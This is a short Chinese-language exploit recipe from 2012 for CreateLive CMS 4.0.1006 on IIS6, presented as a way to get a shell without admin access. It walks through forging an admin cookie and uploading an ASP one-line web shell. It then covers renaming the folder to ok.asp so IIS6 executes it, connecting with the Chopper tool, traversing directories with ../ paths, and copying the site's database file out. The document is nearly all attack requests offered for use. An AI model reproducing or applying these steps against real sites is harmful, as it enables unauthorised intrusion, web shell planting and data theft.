標籤:
Title:CreateLiveCMSV4.0 漏洞,無需後台Get shell --2012-03-06 17:28
標題:CreateLive CMS Version 4.0.1006 漏洞,無需後台 Get shell
必須環境:IIS6,上傳目錄可執行指令碼
CreateLive CMS Version 4.0.1006 是個非常古老滴CMS了。
-----------------------------------------------------------------------------------------------------------------------------------------------
在弄個非常Old的站的時候發現是CreateLive CMS Version 4.0.1006版本。
糾結地找洞時候發現了一點漏洞。
註冊個使用者,登入。
修改cookie:UserGroupID=1&Password=798fb0743e519ec0&UserName=admin&UserID=1
儲存cookie,開啟
http://XXX.XXX.XXX.XXX/dlugis/user/upload.asp?action=F&id=3&type=0
id的值按需求改變.
上傳一個copy的ASP一句話
查看檔案目錄
http://xxx.xxx.xxx.xxx/dlugis/Admin/Admin_Files.asp?action=Main&FileType=select&ChannelID=2&ThisDir=../Photo/2012-3
變更檔夾名
http://XXX.XXX.XXX.XXX/dlugis/Admin/Admin_Files.asp?action=Rname&FileType=select&ChannelID=3&FolderId=2012-3&NewName=ok.asp
查看下成功沒有
菜刀串連
http://XXX.XXX.XXX.XXX/dlugis/Admin/Admin_Files.asp?action=Rname&FileType=select&ChannelID=3&FileId=../../Data/%23Cl_Count.mdb&NewName=ok
把別的目錄的資料庫檔案複製到目前的目錄,檔案名稱為ok.mdb
http://XXX.XXX.XXX.XXX/dlugis/Admin/Admin_Files.asp?action=Main&FileType=select&ChannelID=2&ThisDir=../../../
瀏覽目錄
CreateLiveCMSV4.0 漏洞,無需後台Get shell